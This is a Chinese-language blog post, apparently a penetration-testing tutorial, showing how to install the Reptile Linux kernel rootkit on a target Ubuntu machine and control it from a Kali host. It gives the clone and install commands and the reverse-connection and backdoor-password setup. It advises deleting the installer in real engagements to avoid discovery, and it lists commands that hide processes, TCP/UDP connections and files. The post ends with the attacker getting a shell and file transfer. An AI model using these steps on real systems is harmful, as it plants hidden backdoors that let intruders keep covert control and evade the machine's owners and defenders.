Reptile Linux rootkit后门

项目地址

1
https://github.com/f0rb1dd3n/Reptile

安装

1
2
3
4
apt-get install linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
./setup.sh install

卸载

1
./setup.sh remove

这里来说明一下,安装和卸载都是在渗透目标机器上进行的,需要交互式 shell。下面我以 ubuntu 作为渗透测试目标 kali 作为攻击机器来演示一下如何使用。

on vulnerable ubuntu(192.168.5.148)

和 msf 生成木马比较类似 Reverse IP 是 kali 的 ip,Reverse Port 是 反弹到 kali 的端口,SRC port 是本地接收数据包的端口 Backdoor password 是我们后门的密码。最后提示是否删除这个项目,实战下肯定是要删除的,因为这个客户端和服务端安装都是一个 setup.sh 被发现会被卸载掉,这里我自己的机器就不删了。

看下 rootkit 效果,没有进程,没有连接。

1
2
3
4
5
6
7
隐藏进程: /reptile/reptile_cmd hide <pid> 
显示进程: /reptile/reptile_cmd show <pid>
隐藏udp: /reptile/reptile_cmd udp <IP> <port> hide
显示udp: /reptile/reptile_cmd udp <IP> <port> show
隐藏tcp: /reptile/reptile_cmd tcp <IP> <port> hide
显示tcp: /reptile/reptile_cmd tcp <IP> <port> show
还可以隐藏文件 所有包含 reptile 这个字符的文件会被隐藏,这个字符可以在配置文件中修改。

on attacker kali(192.168.5.149)

安装控制端

1
./setup.sh client

安装好以后配置相关参数

这是候已经连接上了,可以看到可以上传下载和获得一个 shell

文章作者: Carl Star
文章链接: http://carlstar.club/2019/04/09/rep/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Hexo